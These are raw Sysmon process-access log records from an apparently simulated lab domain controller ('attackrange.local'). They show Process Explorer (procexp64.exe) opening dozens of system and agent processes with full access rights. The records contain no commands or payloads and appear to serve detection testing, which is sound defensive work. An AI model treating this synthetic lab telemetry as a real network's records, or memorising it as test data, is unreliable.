15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790910Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790909Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790908Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790907Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790906Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790905Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790904Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790903Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790902Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790901Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790900Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790899Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790898Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790897Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790896Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790895Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790894Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790893Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790892Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790891Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790890Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790889Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790888Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790887Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790886Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790885Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790884Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790883Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790882Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790881Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790880Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790879Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790878Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790877Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790876Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790875Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790874Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 